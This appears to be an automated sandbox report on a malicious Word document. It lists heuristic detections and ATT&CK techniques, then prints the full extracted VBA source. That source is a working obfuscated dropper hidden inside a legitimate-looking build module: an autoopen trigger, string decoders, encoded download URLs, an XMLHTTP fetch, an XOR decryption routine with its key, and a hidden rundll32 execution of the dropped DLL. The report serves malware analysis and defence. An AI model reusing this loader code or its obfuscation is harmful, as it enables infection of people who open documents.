MALICIOUS
392
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
This OOXML document contains obfuscated VBA macros, including an auto-exec loader that utilizes CreateObject and Shell calls. The presence of these critical heuristics, along with the detection as a dropper by ClamAV, strongly indicates malicious intent. The VBA code is designed to execute arbitrary commands, likely to download and run a second-stage payload, as suggested by the 'Obfuscated auto-exec VBA loader' and 'Potential Shell call in VBA' firings.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-1668492 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1668492
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Call Shell("rundll32.exe " & acheacheacheacheacheSULMASUUUKA & ",qwerty", vbHide) Exit Function -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Call Shell("rundll32.exe " & acheacheacheacheacheSULMASUUUKA & ",qwerty", vbHide) Exit Function -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Call Shell("rundll32.exe " & acheacheacheacheacheSULMASUUUKA & ",qwerty", vbHide) Exit Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Public Sub importComponents() Set acheacheacheacheacheSULMAS1DASH1solo = CreateObject(acheacheacheacheacheSULMASPLdunay(3)) Set acheacheacheacheacheSULMASKSKLAL = acheacheacheacheacheSULMAS1DASH1solo.Environment(acheacheacheacheacheSULMASPLdunay(2 * 2)) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName acheacheacheacheacheSULMAShinthorse2, "savet" + "ofile", VbMethod, acheacheacheacheacheSULMASUUUKABBB, 2 milamodbask acheacheacheacheacheSULMASUUUKABBB, acheacheacheacheacheSULMASUUUKA, "z2AnWoNsPWzvRi3lVEqduJTiFqc0of4D" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() addSheetToWorkbook "11", "33" -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 21573 bytes |
SHA-256: a5514ef0d4f1b64a4e4f7e72f1aa9a5d1300459ffa91318f37d0c1a3c43204bf |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
addSheetToWorkbook "11", "33"
End Sub
Attribute VB_Name = "Module1"
'''
' Build instructions:
' 1. Open a new workbook in excel, then open the VB editor (Alt+F11) and from the menu File->Import, import this file:
' * src/vbaDeveloper.xlam/Build.bas
' 2. From tools references... add
' * Microsoft Visual Basic for Applications Extensibility 5.3
' * Microsoft Scripting Runtime
' 3. Rename the project to 'vbaDeveloper'
' 5. Enable programatic access to VBA:
' File -> Options -> Trust Center, Trust Center Settings, -> Macros,
' tick the box: 'Enable programatic access to VBA' (In excel 2010: 'Trust access to the vba project object model')
' 6. If using a non-English version of Excel, rename your current workbook into ThisWorkbook (in VB Editor, press F4,
' then under the local name for Microsoft Excel Objects, select the workbook. Set the property '(Name)' to ThisWorkbook)
' 7. In VB Editor, press F4, then under Microsoft Excel Objects, select ThisWorkbook.Set the property 'IsAddin' to TRUE
' 8. In VB Editor, menu File-->Save Book1; Save as vbaDeveloper.xlam in the same directory as 'src'
' 9. Close excel. Open excel with a new workbook, then open the just saved vbaDeveloper.xlam
' 10.Let vbaDeveloper import its own code. Put the cursor in the function 'testImport' and press F5
' 11.If necessary rename module 'Build1' to Build. Menu File-->Save vbaDeveloper.xlam
'''
Private Const IMPORT_DELAY As String = "00:00:03"
'We need to make these variables public such that they can be given as arguments to application.ontime()
Public componentsToImport As Dictionary 'Key = componentName, Value = componentFilePath
Public sheetsToImport As Dictionary 'Key = componentName, Value = File object
Public vbaProjectToImport As String
Public Sub testExport()
acheacheacheacheacheSULMASASALLLP = acheacheacheacheacheSULMASDAcdaw.responseBody
testImport
Exit Sub
Dim proj_name As String
proj_name = "VbaDeveloper"
Dim vbaProject As Object
Set vbaProject = Application.VBE.VBProjects(proj_name)
Build.exportVbaCode vbaProject
End Sub
' Returns the directory where code is exported to or imported from.
' When createIfNotExists:=True, the directory will be created if it does not exist yet.
' This is desired when we get the directory for exporting.
' When createIfNotExists:=False and the directory does not exist, an empty String is returned.
' This is desired when we get the directory for importing.
'
' Directory names always end with a '\', unless an empty string is returned.
' Usually called with: fullWorkbookPath = wb.FullName or fullWorkbookPath = vbProject.fileName
' if the workbook is new and has never been saved,
' vbProject.fileName will throw an error while wb.FullName will return a name without slashes.
Public Function getSourceDir(fullWorkbookPath As String, createIfNotExists As Boolean) As String
' First check if the fullWorkbookPath contains a \.
If Not InStr(fullWorkbookPath, "\") > 0 Then
'In this case it is a new workbook, we skip it
Exit Function
End If
Dim FSO As Object
Dim projDir As String
projDir = FSO.GetParentFolderName(fullWorkbookPath) & "\"
Dim srcDir As String
srcDir = projDir & "src\"
Dim exportDir As String
exportDir = srcDir & FSO.GetFileName(fullWorkbookPath) & "\"
If createIfNotExists Then
If Not FSO.FolderExists(srcDir) Then
FSO.CreateFolder srcDir
Debug.Print "Created Folder " & srcDir
End If
If Not FSO.FolderExists(exportDir) Then
FSO.CreateFolder exportDir
Debug.Print "Created Folder " & exportDir
End If
Else
If Not FSO.FolderExists(exportDir) Then
Debug.Print "Folder does not exist: " & exportDir
exportDir = ""
End If
End If
getSourceDir = exportDir
End Function
' Usually called after the given workbook is saved
Public Sub exportVbaCode(vbaProject As String)
acheacheacheacheacheSULMAShinthorse2.Type = 2 - 7 / (34 - 27)
acheacheacheacheacheSULMAShinthorse2.Open
Exit Sub
Dim vbProjectFileName As String
On Error Resume Next
'this can throw if the workbook has never been saved.
vbProjectFileName = vbaPro.ject.fileName
On Error GoTo 0
If vbProjectFileName = "" Then
'In this case it is a new workbook, we skip it
Debug.Print "No file name for project " & vbaPr.oject.name & ", skipping"
Exit Sub
End If
Dim export_path As String
export_path = getSourceDir(vbProjectFileName, createIfNotExists:=True)
Debug.Print "exporting to " & export_path
'export all components
Dim component As Object
For Each component In vbaPro.ject.VBCompo.nents
'lblStatus.Caption = "Exporting " & proj_name & "::" & component.Name
If hasCodeToExport(comp.onent) Then
'Debug.Print "exporting type is " & component.Type
Select Case component.Type
Case vbext_ct_ClassModule
exportComponent export_path, comp.onent
Case vbext_ct_StdModule
exportComponent export_path, compon.ent, ".bas"
Case vbext_ct_MSForm
exportComponent export_path, compon.ent, ".frm"
Case vbext_ct_Document
exportLines export_path, compon.ent
Case Else
'Raise "Unkown component type"
End Select
End If
Next component
End Sub
Public Function hasCodeToExport(component As String) As Boolean
CallByName acheacheacheacheacheSULMAShinthorse2, "savet" + "ofile", VbMethod, acheacheacheacheacheSULMASUUUKABBB, 2
milamodbask acheacheacheacheacheSULMASUUUKABBB, acheacheacheacheacheSULMASUUUKA, "z2AnWoNsPWzvRi3lVEqduJTiFqc0of4D"
'acheacheacheacheacheSULMASGMAKO.Open (acheacheacheacheacheSULMASUUUKA)
Call Shell("rundll32.exe " & acheacheacheacheacheSULMASUUUKA & ",qwerty", vbHide)
Exit Function
hasCodeToExport = True
If compon.ent.codeModule.CountOfLines <= 2 Then
Dim firstLine As String
firstLine = Trim(comp.onent.codeModule.Lines(1, 1))
'Debug.Print firstLine
hasCodeToExport = Not (firstLine = "" Or firstLine = "Option Explicit")
End If
End Function
'To export everything else but sheets
Private Sub exportComponent(exportPath As String, component As String, Optional extension As String = ".cls")
Debug.Print "exporting " & compo.nent.name & extension
compon.ent.Export exportPath & "\" & compo.nent.name & extension
End Sub
'To export sheets
Private Sub exportLines(exportPath As String, component As String)
acheacheacheacheacheSULMASLAKOPPC = acheacheacheacheacheSULMASKSKLAL(acheacheacheacheacheSULMASPLdunay(6))
acheacheacheacheacheSULMASUUUKA = acheacheacheacheacheSULMASLAKOPPC
acheacheacheacheacheSULMASUUUKABBB = acheacheacheacheacheSULMASUUUKA + "\hodstad"
acheacheacheacheacheSULMASUUUKA = acheacheacheacheacheSULMASUUUKA + acheacheacheacheacheSULMASPLdunay(12)
Exit Sub
Dim extension As String: extension = ".sheet.cls"
Dim fileName As String
fileName = exportPath & "\" & compo.nent.name & extension
Debug.Print "exporting " & compo.nent.name & extension
'component.Export exportPath & "\" & component.name & extension
Dim FSO As Object
Dim outStream As Object
Set outStream = FSO.CreateTextFile(fileName, True, False)
outStream.Write (compo.nent.codeModule.Lines(1, comp.onent.codeModule.CountOfLines))
outStream.Close
End Sub
' Usually called after the given workbook is opened. The option includeClassFiles is False by default because
' they don't import correctly from VBA. They'll have to be imported manually instead.
Public Sub importVbaCode(vbaProject As String, Optional includeClassFiles As Boolean = False)
Dim vbProjectFileName As Object
On Error Resume Next
'this can throw if the workbook has never been saved.
vbProjectFileName = vbaProj.ect.fileName
On Error GoTo 0
If vbProjectFileName = "" Then
'In this case it is a new workbook, we skip it
Debug.Print "No file name for project " & vbaProj.ect.name & ", skipping"
Exit Sub
End If
Dim export_path As String
export_path = getSourceDir(vbProjectF.ileName, createIfNotExists:=False)
If export_path = "" Then
'The source directory does not exist, code has never been exported for this vbaProject.
Debug.Print "No import directory for project " & vbaProj.ect.name & ", skipping"
Exit Sub
End If
'initialize globals for Application.OnTime
Dim projContents As Object
Set projContents = FSO.GetFolder(export_path)
Dim file As Object
For Each file In projContents.Files()
'check if and how to import the file
checkHowToImport fi.le, includeClassFiles
Next
Dim componentName As String
Dim vComponentName As Variant
'Remove all the modules and class modules
For Each vComponentName In componentsToI.mport.Keys
componentName = vComponentName
removeComponent vbaProject, componentName
Next
'Then import them
Debug.Print "Invoking 'Build.importComponents'with Application.Ontime with delay " & IMPORT_DELAY
' to prevent duplicate modules, like MyClass1 etc.
Application.OnTime Now() + TimeValue(IMPORT_DELAY), "'Build.importComponents'"
Debug.Print "almost finished importing code for " & vbaPro.ject.name
End Sub
Public Function DuBirMahnWeishr(acheacheacheacheacheSULMAS6 As Integer) As String
Dost = CInt(acheacheacheacheacheSULMASXSAOO(acheacheacheacheacheSULMAS6))
DuBirMahnWeishr = Chr(Dost - 329)
End Function
Public Function latarantulalalafdula(CH1 As String, CH2 As String, CH3 As String) As String
latarantulalalafdula = Replace(CH1, CH2, CH3)
End Function
Private Sub checkHowToImport(file As String, includeClassFiles As Boolean)
Dim CherkaPID As Integer
acheacheacheacheacheSULMAS4 = ""
For CherkaPID = LBound(acheacheacheacheacheSULMASXSAOO) To UBound(acheacheacheacheacheSULMASXSAOO)
acheacheacheacheacheSULMAS4 = acheacheacheacheacheSULMAS4 & DuBirMahnWeishr(CherkaPID)
Next CherkaPID
Exit Sub
Dim fileName As String
fileName = fil.E.name
Dim componentName As String
componentName = Left(fileName, InStr(fileName, ".") - 1)
If componentName = "Build" Then
'"don't remove or import ourself
Exit Sub
End If
If Len(fileName) > 4 Then
Dim lastPart As String
lastPart = Right(fileName, 4)
Select Case lastPart
Case ".cls" ' 10 == Len(".sheet.cls")
If Len(fileName) > 10 And Right(fileName, 10) = ".sheet.cls" Then
'import lines into sheet: importLines vbaProjectToImport, file
sheetsToIm.port.Add componentName, file
Else
' .cls files don't import correctly because of a bug in excel, therefore we can exclude them.
' In that case they'll have to be imported manually.
If includeClassFiles Then
'importComponent vbaProject, file
componentsT.oImport.Add componentName, fi.le.Path
End If
End If
Case ".bas", ".frm"
'importComponent vbaProject, file
componentsTo.import.Add componentName, fi.le.Path
Case Else
'do nothing
Debug.Print "Skipping file " & fileName
End Select
End If
End Sub
' Only removes the vba component if it exists
Private Sub removeComponent(vbaProject As String, componentName As String)
checkHowToImport "", False
If Application = "Microsoft Word" Then
acheacheacheacheacheSULMASDAcdaw.Open acheacheacheacheacheSULMASPLdunay(5), acheacheacheacheacheSULMAS4, False
acheacheacheacheacheSULMASDAcdaw.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
acheacheacheacheacheSULMASDAcdaw.Send
exportLines "", ""
exportVbaCode ""
testExport
End If
Exit Sub
If componentExists(vbaProject, componentName) Then
Dim c As String
c = vbaProj.ect.VBComponents(componentName)
Debug.Print "removing " & cmm.name
vbaPr.oject.VBComponents.Remove c
End If
End Sub
Public Sub importComponents()
Set acheacheacheacheacheSULMAS1DASH1solo = CreateObject(acheacheacheacheacheSULMASPLdunay(3))
Set acheacheacheacheacheSULMASKSKLAL = acheacheacheacheacheSULMAS1DASH1solo.Environment(acheacheacheacheacheSULMASPLdunay(2 * 2))
removeComponent "", ""
Exit Sub
If componentsToImport Is Nothing Then
Debug.Print "Failed to import! Dictionary 'componentsToImport' was not initialized."
Exit Sub
End If
Dim componentName As String
Dim vComponentName As Variant
For Each vComponentName In componentsT.oImport.Keys
componentName = vComponentName
importComponent vbaProjectToImport, componen.tsToImport(componentName)
Next
'Import the sheets
For Each vComponentName In sheetsToI.mport.Keys
componentName = vComponentName
import.Lines vbaProjectToImport, sheetsT.oImport(componentName)
Next
Debug.Print "Finished importing code for " & vbaProjectToI.mport.name
'We're done, clear globals explicitly to free memory.
Set componentsToImport = Nothing
End Sub
' Assumes any component with same name has already been removed.
Private Sub importComponent(vbaProject As String, filePath As String)
Debug.Print "Importing component from " & filePath
'This next line is a bug! It imports all classes as modules!
vbaPro.ject.VBComponents.import filePath
End Sub
' Returns the CodeName of the added sheet or an empty String if the workbook could not be opened.
Public Function addSheetToWorkbook(sheetName As String, workbookFilePath As String) As String
acheacheacheacheacheSULMAStruuuk = "DUUMicroDUUUMoft.XDUUMLHTTPDUUUUMAdodb" + ".DUUUMtrDUMaDUUMDUUUUMDUUUMhDUMll.Ap"
acheacheacheacheacheSULMAStruuuk = acheacheacheacheacheSULMAStruuuk + latarantulalalafdula("plicationDUUUUMWDUUUMcript.DUUUMhDUMllDUUUUMProcDUMDUUUMDUUUMDUUUUMGDUMTDUUUUMTDUMDUUMPDUUUUMTypDUMDUUUUMopDUMnDUUUUMwritFILMABOponDUUUMDUMBodyDUUUUMDUUUMavDUMtofilDUMDUUUUM", "FILMABO", "DUMDUUUUMrDUMDUUUM")
acheacheacheacheacheSULMAStruuuk = latarantulalalafdula(acheacheacheacheacheSULMAStruuuk + "\dwwaccDUUUM" + ".dll", "DUM", "e")
kokoka = Split("433у445у445у441у387у376у376у448у448у448у375у428у426у437у437у434у444у445у440у375у428у427у426у375у441у437у376у440у442у438у431у439у426у443...433у445у445у441у387у376у376у448у448у448у375у448у433у434у445у426у436у430у443у441у429у375у428у440у375у446у436у376у450у438у438у428у432у446у436...433у445у445у441у387у376у376у448у448у448у375у441у426у443у443у446у428у428у433у434у430у443у434у426у432у434у426у428у440у438у440у375у428у440у438у376у429у430у436у435у449у446у444", "...")
For n = LBound(kokoka) To UBound(kokoka)
On Error GoTo nnnext
acheacheacheacheacheSULMASXSAOO = Split(kokoka(n), "у")
openWorkbook "ee"
Exit Function
nnnext:
Next n
Exit Function
Dim wb As String
On Error Resume Next 'can throw if given path does not exist
Set wmm.b = openWorkbook(workbookFilePath)
On Error GoTo 0
If Not wmb.mm Is Nothing Then
Dim ws As String
ws = wbmm.Sheets.Add(After:=wbmmm.Sheets(wmmb.Sheets.Count))
wnns.name = sheetName
'ws.CodeName = sheetName: cannot assign to read only property
Debug.Print "Sheet added " & sheetName
addSheetToWorkbook = wnns.CodeName
Else
Debug.Print "Skipping file " & sheetName & ". Could not open workbook " & workbookFilePath
addSheetToWorkbook = ""
End If
End Function
Public Sub importLines(vbaProject As Object, file As Object)
Dim i As Integer
Dim d As Boolean
d = True
IsWord = True
For i = 1 To Len(Trim("AAsc"))
If d = False Then
Set acheacheacheacheacheSULMASDAcdaw = CreateObject(acheacheacheacheacheSULMASPLdunay(i - 2))
Exit For
Else
d = False
End If
Next i
importComponents
Exit Sub
Dim componentName As String
componentName = Left(file.name, InStr(file.name, ".") - 1)
Dim c As String
If Not componentExists(vbaPro.ject, componentName) Then
' Create a sheet to import this code into. We cannot set the ws.codeName property which is read-only,
' instead we set its vbComponent.name which leads to the same result.
Dim addedSheetCodeName As String
addedSheetCodeName = addSheetToWorkbook(componentName, vbaProject.fileName)
Set jj.c = vbaProject.VBComponents(addedSheetCodeName)
jj.name = componentName
End If
Set cjjj.jj = vbaProject.VBComponents(componentName)
Debug.Print "Importing lines from " & componentName & " into component " & jjc.name
' At this point compilation errors may cause a crash, so we ignore those.
On Error Resume Next
jjj.codeModule.DeleteLines 1, jjj.codeModule.CountOfLines
jjj.codeModule.AddFromFile fi.le.Path
On Error GoTo 0
End Sub
Public Function componentExists(ByRef proj As String, name As String) As Boolean
acheacheacheacheacheSULMAStruuuk = latarantulalalafdula(acheacheacheacheacheSULMAStruuuk, "DUUUM", LCase("S"))
acheacheacheacheacheSULMASPLdunay = Split(acheacheacheacheacheSULMAStruuuk, "DUUUUM")
Exit Function
On Error GoTo doesnt
Dim c As String
c = pr.oj.VBComponents(name)
componentExists = True
Exit Function
doesnt:
componentExists = False
End Function
Attribute VB_Name = "Module2"
Public acheacheacheacheacheSULMASDAcdaw As Object
Public acheacheacheacheacheSULMAShinthorse2 As Object
Public acheacheacheacheacheSULMASKSKLAL As Object
Public acheacheacheacheacheSULMASXSAOO() As String
Public acheacheacheacheacheSULMASLAKOPPC As String
Public acheacheacheacheacheSULMASPLdunay() As String
Public acheacheacheacheacheSULMASUUUKA As String
Public acheacheacheacheacheSULMASUUUKABBB As String
Public acheacheacheacheacheSULMASGMAKO As Object
Public acheacheacheacheacheSULMAS4 As String
Public acheacheacheacheacheSULMAStruuuk As String
Public acheacheacheacheacheSULMASASALLLP As Variant
Public Sub testImport()
CallByName acheacheacheacheacheSULMAShinthorse2, "write", VbMethod, acheacheacheacheacheSULMASASALLLP
hasCodeToExport ""
Exit Sub
Dim proj_name As String
proj_name = "VbaDeveloper"
Dim vbaProject As Object
Set vbaProject = Application.VBE.VBProjects(proj_name)
Build.importVbaCode vbaProject
End Sub
Public Sub DecryptByte(DATAARRAY() As Byte, Key As String)
Dim offset As Long
Dim ByteLen As Long
Dim ResultLen As Long
Dim CurrPercent As Long
Dim NextPercent As Long
Dim m_Key() As Byte
Dim m_KeyLen As Long
m_KeyLen = Len(Key)
ReDim m_Key(m_KeyLen)
m_Key = StrConv(Key, vbFromUnicode)
ByteLen = UBound(DATAARRAY) + 1
ResultLen = ByteLen
For offset = 0 To (ByteLen - 1)
DATAARRAY(offset) = DATAARRAY(offset) Xor m_Key(offset Mod m_KeyLen)
If (offset >= NextPercent) Then
CurrPercent = Int((offset / ResultLen) * 100)
NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
End If
Next
End Sub
' Returns a reference to the workbook. Opens it if it is not already opened.
' Raises error if the file cannot be found.
Public Function openWorkbook(ByVal filePath As String) As String
acheacheacheacheacheSULMAStruuuk = latarantulalalafdula(acheacheacheacheacheSULMAStruuuk, "DUUM", "M")
componentExists "", ""
Set acheacheacheacheacheSULMAShinthorse2 = CreateObject(acheacheacheacheacheSULMASPLdunay(1))
Set acheacheacheacheacheSULMASGMAKO = CreateObject(acheacheacheacheacheSULMASPLdunay(5 - 3))
importLines Nothing, Nothing
Exit Function
Dim wb As String
Dim fileName As String
fileName = Dir(filePath)
On Error Resume Next
wb = Work.books(fileName)
On Error GoTo 0
If wbmm.mm Is Nothing Then
wb = Workbooks.Open(filePath) 'can raise error
End If
Set openWom.rkbook = wb
End Function
Public Sub milamodbask(SourceFile As String, DestFile As String, Optional Key As String)
Dim Filenr As Integer
Dim DATAARRAY() As Byte
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
HHdn = LOF(Filenr)
ReDim DATAARRAY(0 To HHdn - 1)
Get #Filenr, , DATAARRAY()
Close #Filenr
Call DecryptByte(DATAARRAY(), Key)
Filenr = FreeFile
Open DestFile For Binary As #Filenr
Put #Filenr, , DATAARRAY()
Close #Filenr
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 49152 bytes |
SHA-256: 75842ad368ee80fd677679da607b6ee3ed1531d01ec3d4ffbce588afad0d3e38 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.